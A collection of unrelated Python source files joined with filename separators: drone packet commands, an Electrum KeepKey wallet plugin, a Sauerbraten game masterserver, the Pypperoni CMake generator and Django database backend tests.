self.safe_send(packet)
def send_pcmd_command(self, command_tuple, roll, pitch, yaw, vertical_movement, duration):
"""
Send the PCMD command with the specified roll, pitch, and yaw
:param command_tuple: command tuple per the parser
:param roll:
:param pitch:
:param yaw:
:param vertical_movement:
:param duration:
"""
start_time = datetime.now()
new_time = datetime.now()
diff = (new_time - start_time).seconds + ((new_time - start_time).microseconds / 1000000.0)
while (diff < duration):
self.send_single_pcmd_command(command_tuple, roll, pitch, yaw, vertical_movement)
self.smart_sleep(0.1)
new_time = datetime.now()
diff = (new_time - start_time).seconds + ((new_time - start_time).microseconds / 1000000.0)
def send_fly_relative_command(self, command_tuple, change_x, change_y, change_z, change_angle):
"""
Send the packet to fly relative (this is Bebop only).
:param command_tuple: command tuple per the parser
:param change_x: change in x
:param change_y: change in y
:param change_z: change in z
:param change_angle: change in angle
"""
self.sequence_counter['SEND_WITH_ACK'] = (self.sequence_counter['SEND_WITH_ACK'] + 1) % 256
packet = struct.pack("<BBBIBBHffff",
self.data_types_by_name['DATA_WITH_ACK'],
self.buffer_ids['SEND_WITH_ACK'],
self.sequence_counter['SEND_WITH_ACK'],
27,
command_tuple[0], command_tuple[1], command_tuple[2],
change_x, change_y, change_z, change_angle)
self.safe_send(packet)
def send_turn_command(self, command_tuple, degrees):
"""
Build the packet for turning and send it
:param command_tuple: command tuple from the parser
:param degrees: how many degrees to turn
:return: True if the command was sent and False otherwise
"""
self.sequence_counter['SEND_WITH_ACK'] = (self.sequence_counter['SEND_WITH_ACK'] + 1) % 256
packet = struct.pack("<BBBIBBHh",
self.data_types_by_name['DATA_WITH_ACK'],
self.buffer_ids['SEND_WITH_ACK'],
self.sequence_counter['SEND_WITH_ACK'],
13,
command_tuple[0], command_tuple[1], command_tuple[2],
degrees)
return self.send_command_packet_ack(packet, self.sequence_counter['SEND_WITH_ACK'])
def send_camera_move_command(self, command_tuple, pan, tilt):
"""
Send the packet to move the camera (this is Bebop only).
:param command_tuple: command tuple per the parser
:param pan:
:param tilt:
"""
self.sequence_counter['SEND_WITH_ACK'] = (self.sequence_counter['SEND_WITH_ACK'] + 1) % 256
packet = struct.pack("<BBBIBBHff",
self.data_types_by_name['DATA_WITH_ACK'],
self.buffer_ids['SEND_WITH_ACK'],
self.sequence_counter['SEND_WITH_ACK'],
19,
command_tuple[0], command_tuple[1], command_tuple[2],
pan, tilt)
self.safe_send(packet)
def send_enum_command_packet_ack(self, command_tuple, enum_value, usb_id=None):
"""
Send a command on the ack channel with enum parameters as well (most likely a flip).
All commandsandsensors except PCMD go on the ack channel per
http://forum.developer.parrot.com/t/ble-characteristics-of-minidrones/5912/2
the id of the last command sent (for use in ack) is the send counter (which is incremented before sending)
:param command_tuple: 3 tuple of the command bytes. 0 padded for 4th byte
:param enum_value: the enum index
:return: nothing
"""
self.sequence_counter['SEND_WITH_ACK'] = (self.sequence_counter['SEND_WITH_ACK'] + 1) % 256
if (usb_id is None):
packet = struct.pack("<BBBIBBHI", self.data_types_by_name['DATA_WITH_ACK'],
self.buffer_ids['SEND_WITH_ACK'],
self.sequence_counter['SEND_WITH_ACK'], 15,
command_tuple[0], command_tuple[1], command_tuple[2],
enum_value)
else:
packet = struct.pack("<BBBIBBHBI", self.data_types_by_name['DATA_WITH_ACK'],
self.buffer_ids['SEND_WITH_ACK'],
self.sequence_counter['SEND_WITH_ACK'], 16,
command_tuple[0], command_tuple[1], command_tuple[2],
usb_id, enum_value)
return self.send_command_packet_ack(packet, self.sequence_counter['SEND_WITH_ACK'])
def smart_sleep(self, timeout):
"""
Sleeps the requested number of seconds but wakes up for notifications
Note: time.sleep misbehaves for the BLE connections but seems ok for wifi.
I encourage you to use smart_sleep since it handles the sleeping in a thread-safe way.
:param timeout: number of seconds to sleep
:return:
"""
start_time = datetime.now()
new_time = datetime.now()
diff = (new_time - start_time).seconds + ((new_time - start_time).microseconds / 1000000.0)
while (diff < timeout):
time.sleep(0.1)
new_time = datetime.now()
diff = (new_time - start_time).seconds + ((new_time - start_time).microseconds / 1000000.0)
def ack_packet(self, buffer_id, packet_id):
"""
Ack the packet id specified by the argument on the ACK_COMMAND channel
:param packet_id: the packet id to ack
:return: nothing
"""
#color_print("ack: buffer id of %d and packet id of %d" % (buffer_id, packet_id))
new_buf_id = (buffer_id + 128) % 256
if (new_buf_id not in self.sequence_counter):
self.sequence_counter[new_buf_id] = 0
else:
self.sequence_counter[new_buf_id] = (self.sequence_counter[new_buf_id] + 1) % 256
packet = struct.pack("<BBBIB", self.data_types_by_name['ACK'], new_buf_id,
self.sequence_counter[new_buf_id], 8,
packet_id)
self.safe_send(packet)
|
plugin.py
|
from binascii import hexlify, unhexlify
from electrum.util import bfh, bh2u
from electrum.bitcoin import (b58_address_to_hash160, xpub_from_pubkey,
TYPE_ADDRESS, TYPE_SCRIPT,
is_segwit_address)
from electrum import constants
from electrum.i18n import _
from electrum.plugins import BasePlugin
from electrum.transaction import deserialize, Transaction
from electrum.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class KeepKeyCompatibleKeyStore(Hardware_KeyStore):
def get_derivation(self):
return self.derivation
def is_segwit(self):
return self.derivation.startswith("m/49'/")
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise RuntimeError(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
raise Exception(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class KeepKeyCompatiblePlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
if self.libraries_available:
self.device_manager().register_devices(self.DEVICE_IDS)
def _try_hid(self, device):
self.print_error("Trying to connect over USB...")
if device.interface_number == 1:
pair = [None, device.path]
else:
pair = [device.path, None]
try:
return self.hid_transport(pair)
except BaseException as e:
# see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
# raise
self.print_error("cannot connect at", device.path, str(e))
return None
def _try_bridge(self, device):
self.print_error("Trying to connect over Trezor Bridge...")
try:
return self.bridge_transport({'path': hexlify(device.path)})
except BaseException as e:
self.print_error("cannot connect to bridge", str(e))
return None
def create_client(self, device, handler):
# disable bridge because it seems to never returns if KeepKey is plugged
#transport = self._try_bridge(device) or self._try_hid(device)
transport = self._try_hid(device)
if not transport:
self.print_error("cannot connect to device")
return
self.print_error("connected to device at", device.path)
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
handler.show_error(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Bithereum"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target = self._initialize_device, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
wizard.loop.exec_()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
wizard.loop.exit(0)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in ('standard',):
raise ScriptTypeNotSupported(_('This type of script is not supported with KeepKey.'))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True, keystore.is_segwit())
outputs = self.tx_outputs(keystore.get_derivation(), tx, keystore.is_segwit())
signed_tx = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[1]
raw = bh2u(signed_tx)
tx.update_signatures(raw)
def show_address(self, wallet, address):
client = self.get_client(wallet.keystore)
if not client.atleast_version(1, 3):
wallet.keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = wallet.keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
segwit = wallet.keystore.is_segwit()
script_type = self.types.SPENDP2SHWITNESS if segwit else self.types.SPENDADDRESS
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
def tx_inputs(self, tx, for_sig=False, segwit=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = "\0"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
txinputtype.script_type = self.types.SPENDP2SHWITNESS if segwit else self.types.SPENDADDRESS
else:
def f(x_pubkey):
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
else:
xpub = xpub_from_pubkey(0, bfh(x_pubkey))
s = []
node = self.ckd_public.deserialize(xpub)
return self.types.HDNodePathType(node=node, address_n=s)
pubkeys = map(f, x_pubkeys)
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures')),
m=txin.get('num_sig'),
)
script_type = self.types.SPENDP2SHWITNESS if segwit else self.types.SPENDMULTISIG
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if 'scriptSig' in txin:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx, segwit=False):
def create_output_by_derivation(info):
index, xpubs, m = info
if len(xpubs) == 1:
script_type = self.types.PAYTOP2SHWITNESS if segwit else self.types.PAYTOADDRESS
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=script_type,
address_n=address_n,
)
else:
script_type = self.types.PAYTOP2SHWITNESS if segwit else self.types.PAYTOMULTISIG
address_n = self.client_class.expand_path("/%d/%d" % index)
nodes = map(self.ckd_public.deserialize, xpubs)
pubkeys = [self.types.HDNodePathType(node=node, address_n=address_n) for node in nodes]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.PAYTOOPRETURN
txoutputtype.op_return_data = address[2:]
elif _type == TYPE_ADDRESS:
if is_segwit_address(address):
txoutputtype.script_type = self.types.PAYTOWITNESS
else:
addrtype, hash_160 = b58_address_to_hash160(address)
if addrtype == constants.net.ADDRTYPE_P2PKH:
txoutputtype.script_type = self.types.PAYTOADDRESS
elif addrtype == constants.net.ADDRTYPE_P2SH:
txoutputtype.script_type = self.types.PAYTOSCRIPTHASH
else:
raise Exception('addrtype: ' + str(addrtype))
txoutputtype.address = address
return txoutputtype
def is_any_output_on_change_branch():
for _type, address, amount in tx.outputs():
info = tx.output_info.get(address)
if info is not None:
index, xpubs, m = info
if index[0] == 1:
return True
return False
outputs = []
has_change = False
any_output_on_change_branch = is_any_output_on_change_branch()
for _type, address, amount in tx.outputs():
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation(info)
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t.inputs.extend(inputs)
for vout in d['outputs']:
o = t.bin_outputs.add()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
masterserver.py
|
#!/usr/bin/env python
from threading import Thread
import socket
import time
from time import gmtime, strftime
import os
import sys
import string
class masterserver(object):
settings = {
"host": "sauerbraten-fork.org",
"port": 28787,
"log": "master.log"
}
proxy = {
"host": "sauerbraten.org",
"port": 28787
}
servers = []
shutdown = False
logfile = None
serv = None
updatesecs = 60
def log(self, text):
if self.logfile == None:
if os.path.exists(self.settings["log"]):
self.logfile = open(self.settings["log"], "a")
else:
self.logfile = open(self.settings["log"], "w")
self.logfile.write("\n" + time.strftime("[%a %m/%d/%Y %H:%M:%S] ") + text)
self.logfile.flush()
def getserversfromproxy(self):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((self.proxy["host"], self.proxy["port"]))
s.send('list\n')
data = ""
while True:
bucket=s.recv(512)
if not bucket:
break
else:
data += bucket
s.close()
return data
except socket.error, msg:
self.log("PROXY: error in connecting to masterserver %s:%s" %(self.proxy["host"], self.proxy["port"]))
s.close()
s = None
except socket.error, msg:
self.log("PROXY: error in creating socket")
s = None
return 'echo "error connecting remote masterserver %s:%s"' %(proxy_hostname, proxy_port)
def getlocalservers(self):
s_str = ""
for server in self.servers:
if s_str == "":
s_str = "addserver %s %s\n" %(server["ip"], server["port"])
else:
s_str = "%saddserver %s %s\n" %(s_str, server["ip"], server["port"])
return s_str
def register(self, ip, port):
server = {
"ip": ip,
"port": port
}
already = False
for s in self.servers:
if s["ip"] == server["ip"] and s["port"] == server["port"]:
already = True
if not already:
self.servers.append(server)
return True
def unregister(self, ip, port):
server = {
"ip": ip,
"port": port
}
already = False
for s in self.servers:
if s["ip"] == server["ip"] and s["port"] == server["port"]:
self.servers.remove(s)
def acceptclient(self, infos):
if self.shutdown:
return
self.log("accepted a connection: " + str(infos[1]))
con = infos[0]
cid = str(infos[1][1])
ip = str(infos[1][0])
data = con.recv(4096)
if data == "list\n":
serverstr = "%s%s" %(self.getlocalservers(), self.getserversfromproxy())
con.send(serverstr)
#self.log("=== successfully sent server list ===")
#self.log(serverstr)
#self.log("=== successfully sent server list ===")
else:
if data[0:7] == "regserv":
port = data[8:].replace("\n","").replace("\r","")
if self.register(ip, port):
self.log("successfully registered server %s %s" %(ip, port))
con.send("succreg\n")
i = 0
while i < self.updatesecs and not self.shutdown:
time.sleep(1)
else:
self.log("failed to register server %s %s" %(ip, port))
con.send("failreg\n")
else:
self.log("client wanted something unknown: %s" %(data))
self.log("request done")
# con.send("");
con.close()
def initsocket(self):
i = 0
while i < 5:
i = i + 1
try:
self.log("starting...")
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.serv.bind((self.settings["host"], self.settings["port"]))
#self.serv.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
#self.serv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.serv.listen(1)
return True
except:
self.log("ERROR socket initialization failed, retrying in 5 seconds")
time.sleep(5)
return False
def main(self):
if not self.initsocket():
self.log("could not start masterserver: hostname or port error")
print "could not start masterserver: hostname or port error"
return
else:
self.log("port binding succeeded...")
print "waiting for clients ..."
while True:
try:
infos = self.serv.accept()
try:
temp_thread = Thread(target=self.acceptclient, args=(infos,))
temp_thread.start()
except:
pass
except:
self.log("shutdown...")
self.shutdown = True
self.logfile.close()
return
if __name__ == '__main__':
ms = masterserver()
ms.main()
|
cmake.py
|
# Copyright (c) Pypperoni
#
# Pypperoni is licensed under the MIT License; you may
# not use it except in compliance with the License.
#
# You should have received a copy of the License with
# this source code under the name "LICENSE.txt". However,
# you may obtain a copy of the License on our GitHub here:
# https://github.com/Pypperoni/pypperoni
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the
# License.
from pypperoni.files import ConditionalFile, FileContainer
from pypperoni.module import Module, write_modules_file
from pypperoni.codeobj import write_frames_file
from pypperoni.util import safePrint
from threading import Thread, Lock
from Queue import Queue, Empty
import traceback
import hashlib
import math
import sys
import os
PYPPERONI_ROOT = os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))
class CMakeFileGenerator:
def __init__(self, project, outputdir='build', nthreads=4):
self.project = project
self.outputdir = outputdir
self.nthreads = nthreads
self.modules = {}
self.__files = []
self.cmake_in_file = os.path.join(PYPPERONI_ROOT, 'pypperoni', 'cmake.in')
self.add_directory(os.path.join(PYPPERONI_ROOT, 'python', 'Lib'))
self.generate_codecs_index()
def add_file(self, filename, name=None):
'''
Adds a single file to modules.
If name is not provided, it's inferred from filename:
path/to/file -> path.to.file
'''
with open(filename, 'rb') as f:
data = f.read()
if name is None:
name = os.path.normpath(filename.rsplit('.', 1)[0]).replace(os.sep, '.')
if name.endswith('.__init__'):
name = name[:-9]
self.add_module(name, data)
def add_module(self, name, data):
code = compile(data, name, 'exec')
self.modules[name] = Module(name, code)
def add_directory(self, path):
'''
Adds all Python files (.py) in a directory to modules.
For example,
dir1/
file1.py
file2.py
will add the modules "file1" and "file2"
'''
cwd = os.getcwd()
path = os.path.abspath(path)
os.chdir(path)
try:
for root, _, filenames in os.walk('.'):
for filename in filenames:
if filename.endswith('.py'):
self.add_file(os.path.join(root, filename))
finally:
os.chdir(cwd)
def add_tree(self, path):
'''
Adds all Python files (.py) in a directory to modules, preserving the tree name.
For example,
tree1/
file1.py
file2.py
will add the modules "tree1.file1" and "tree1.file2"
'''
cwd = os.getcwd()
path = os.path.abspath(path)
os.chdir(os.path.dirname(path))
try:
for root, _, filenames in os.walk(os.path.basename(path)):
for filename in filenames:
if filename.endswith('.py'):
self.add_file(os.path.join(root, filename))
finally:
os.chdir(cwd)
def generate_codecs_index(self):
data = 'from encodings import register_mod\n'
for k in self.modules:
if k.startswith('encodings.'):
name = k[10:]
data += 'from encodings import %s\n' % name
data += 'register_mod(%s)\n' % name
self.add_module('codecs_index', data)
@staticmethod
def hash_file(f):
hash = hashlib.sha256()
while True:
data = f.read(8192)
if not data:
break
hash.update(data)
return hash.hexdigest()[:7]
def __process_one(self, name, module):
prefix = os.path.join(self.outputdir, 'gen', 'modules', name)
f = FileContainer(prefix, self.hash_file)
module.generate_c_code(f, self.modules)
with Lock():
self.__files.extend(os.path.join('modules', os.path.basename(x[0])) for x in f.close())
def __worker(self):
while True:
try:
name, module, text = self.__queue.get_nowait()
except Empty:
break
safePrint(text)
error = False
try:
self.__process_one(name, module)
except:
sys.stderr.write('Exception in thread')
error = True
sys.stderr.write(traceback.format_exc())
finally:
self.__queue.task_done()
if error:
sys.stdout.flush()
sys.stderr.flush()
os._exit(1)
def run(self):
modules_dir = os.path.join(self.outputdir, 'gen', 'modules')
if not os.path.isdir(modules_dir):
os.makedirs(modules_dir)
self.__queue = Queue()
total = len(self.modules)
n = int(math.ceil(math.log(total, 10)))
_format = '[%%%dd/%%%dd] %%s' % (n, n)
i = 0
for name, module in self.modules.items():
i += 1
text = _format % (i, total, name)
self.__queue.put((name, module, text))
for i in xrange(self.nthreads):
t = Thread(target=self.__worker)
t.daemon = True
t.start()
self.__queue.join()
filename = os.path.join(self.outputdir, 'gen', 'modules.I')
f = ConditionalFile(filename, self.hash_file)
write_modules_file(f, self.modules)
self.__files.append(os.path.basename(f.close()[0]))
filename = os.path.join(self.outputdir, 'gen', 'frames.I')
f = ConditionalFile(filename, self.hash_file)
write_frames_file(f)
self.__files.append(os.path.basename(f.close()[0]))
files = ''
for filename in self.__files:
files += ' %s\n' % os.path.join('gen', filename).replace('\\', '/')
with open(self.cmake_in_file, 'rb') as f:
cmakein = f.read()
cmakein = cmakein.replace('$$project$$', self.project)
cmakein = cmakein.replace('$$files$$', files)
cmakein = cmakein.replace('$$pypperoni_root$$', PYPPERONI_ROOT.replace('\\', '/'))
with open(os.path.join(self.outputdir, 'CMakeLists.txt'), 'wb') as f:
f.write(cmakein)
|
tests.py
|
# -*- coding: utf-8 -*-
# Unit and doctests for specific database backends.
from __future__ import unicode_literals
import datetime
import re
import threading
import unittest
import warnings
from decimal import Decimal, Rounded
from django.core.exceptions import ImproperlyConfigured
from django.core.management.color import no_style
from django.db import (
DEFAULT_DB_ALIAS, DatabaseError, IntegrityError, connection, connections,
reset_queries, transaction,
)
from django.db.backends.base.base import BaseDatabaseWrapper
from django.db.backends.postgresql import version as pg_version
from django.db.backends.signals import connection_created
from django.db.backends.utils import CursorWrapper, format_number
from django.db.models import Avg, StdDev, Sum, Variance
from django.db.models.sql.constants import CURSOR
from django.db.utils import ConnectionHandler
from django.test import (
SimpleTestCase, TestCase, TransactionTestCase, mock, override_settings,
skipIfDBFeature, skipUnlessDBFeature,
)
from django.utils import six
from django.utils.six.moves import range
from .models import (
Article, Item, Object, ObjectReference, Person, Post, RawData, Reporter,
ReporterProxy, SchoolClass, Square,
VeryLongModelNameZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ,
)
class DatabaseWrapperTests(SimpleTestCase):
def test_initialization_class_attributes(self):
"""
The "initialization" class attributes like client_class and
creation_class should be set on the class and reflected in the
corresponding instance attributes of the instantiated backend.
"""
conn = connections[DEFAULT_DB_ALIAS]
conn_class = type(conn)
attr_names = [
('client_class', 'client'),
('creation_class', 'creation'),
('features_class', 'features'),
('introspection_class', 'introspection'),
('ops_class', 'ops'),
('validation_class', 'validation'),
]
for class_attr_name, instance_attr_name in attr_names:
class_attr_value = getattr(conn_class, class_attr_name)
self.assertIsNotNone(class_attr_value)
instance_attr_value = getattr(conn, instance_attr_name)
self.assertIsInstance(instance_attr_value, class_attr_value)
class DummyBackendTest(SimpleTestCase):
def test_no_databases(self):
"""
Empty DATABASES setting default to the dummy backend.
"""
DATABASES = {}
conns = ConnectionHandler(DATABASES)
self.assertEqual(conns[DEFAULT_DB_ALIAS].settings_dict['ENGINE'], 'django.db.backends.dummy')
with self.assertRaises(ImproperlyConfigured):
conns[DEFAULT_DB_ALIAS].ensure_connection()
@unittest.skipUnless(connection.vendor == 'oracle', "Test only for Oracle")
class OracleTests(unittest.TestCase):
def test_quote_name(self):
# '%' chars are escaped for query execution.
name = '"SOME%NAME"'
quoted_name = connection.ops.quote_name(name)
self.assertEqual(quoted_name % (), name)
def test_dbms_session(self):
# If the backend is Oracle, test that we can call a standard
# stored procedure through our cursor wrapper.
with connection.cursor() as cursor:
cursor.callproc('DBMS_SESSION.SET_IDENTIFIER', ['_django_testing!'])
def test_cursor_var(self):
# If the backend is Oracle, test that we can pass cursor variables
# as query parameters.
from django.db.backends.oracle.base import Database
with connection.cursor() as cursor:
var = cursor.var(Database.STRING)
cursor.execute("BEGIN %s := 'X'; END; ", [var])
self.assertEqual(var.getvalue(), 'X')
def test_long_string(self):
# If the backend is Oracle, test that we can save a text longer
# than 4000 chars and read it properly
with connection.cursor() as cursor:
cursor.execute('CREATE TABLE ltext ("TEXT" NCLOB)')
long_str = ''.join(six.text_type(x) for x in range(4000))
cursor.execute('INSERT INTO ltext VALUES (%s)', [long_str])
cursor.execute('SELECT text FROM ltext')
row = cursor.fetchone()
self.assertEqual(long_str, row[0].read())
cursor.execute('DROP TABLE ltext')
def test_client_encoding(self):
# If the backend is Oracle, test that the client encoding is set
# correctly. This was broken under Cygwin prior to r14781.
connection.ensure_connection()
self.assertEqual(connection.connection.encoding, "UTF-8")
self.assertEqual(connection.connection.nencoding, "UTF-8")
def test_order_of_nls_parameters(self):
# an 'almost right' datetime should work with configured
# NLS parameters as per #18465.
with connection.cursor() as cursor:
query = "select 1 from dual where '1936-12-29 00:00' < sysdate"
# The query succeeds without errors - pre #18465 this
# wasn't the case.
cursor.execute(query)
self.assertEqual(cursor.fetchone()[0], 1)
@unittest.skipUnless(connection.vendor == 'sqlite', "Test only for SQLite")
class SQLiteTests(TestCase):
longMessage = True
def test_autoincrement(self):
"""
auto_increment fields are created with the AUTOINCREMENT keyword
in order to be monotonically increasing. Refs #10164.
"""
with connection.schema_editor(collect_sql=True) as editor:
editor.create_model(Square)
statements = editor.collected_sql
match = re.search('"id" ([^,]+),', statements[0])
self.assertIsNotNone(match)
self.assertEqual(
'integer NOT NULL PRIMARY KEY AUTOINCREMENT',
match.group(1),
"Wrong SQL used to create an auto-increment column on SQLite"
)
def test_aggregation(self):
"""
#19360: Raise NotImplementedError when aggregating on date/time fields.
"""
for aggregate in (Sum, Avg, Variance, StdDev):
with self.assertRaises(NotImplementedError):
Item.objects.all().aggregate(aggregate('time'))
with self.assertRaises(NotImplementedError):
Item.objects.all().aggregate(aggregate('date'))
with self.assertRaises(NotImplementedError):
Item.objects.all().aggregate(aggregate('last_modified'))
with self.assertRaises(NotImplementedError):
Item.objects.all().aggregate(
**{'complex': aggregate('last_modified') + aggregate('last_modified')}
)
def test_memory_db_test_name(self):
"""
A named in-memory db should be allowed where supported.
"""
from django.db.backends.sqlite3.base import DatabaseWrapper
settings_dict = {
'TEST': {
'NAME': 'file:memorydb_test?mode=memory&cache=shared',
}
}
wrapper = DatabaseWrapper(settings_dict)
creation = wrapper.creation
if creation.connection.features.can_share_in_memory_db:
expected = creation.connection.settings_dict['TEST']['NAME']
self.assertEqual(creation._get_test_db_name(), expected)
else:
msg = (
"Using a shared memory database with `mode=memory` in the "
"database name is not supported in your environment, "
"use `:memory:` instead."
)
with self.assertRaisesMessage(ImproperlyConfigured, msg):
creation._get_test_db_name()
@unittest.skipUnless(connection.vendor == 'postgresql', "Test only for PostgreSQL")
class PostgreSQLTests(TestCase):
def assert_parses(self, version_string, version):
self.assertEqual(pg_version._parse_version(version_string), version)
def test_parsing(self):
"""Test PostgreSQL version parsing from `SELECT version()` output"""
self.assert_parses("PostgreSQL 9.3 beta4", 90300)
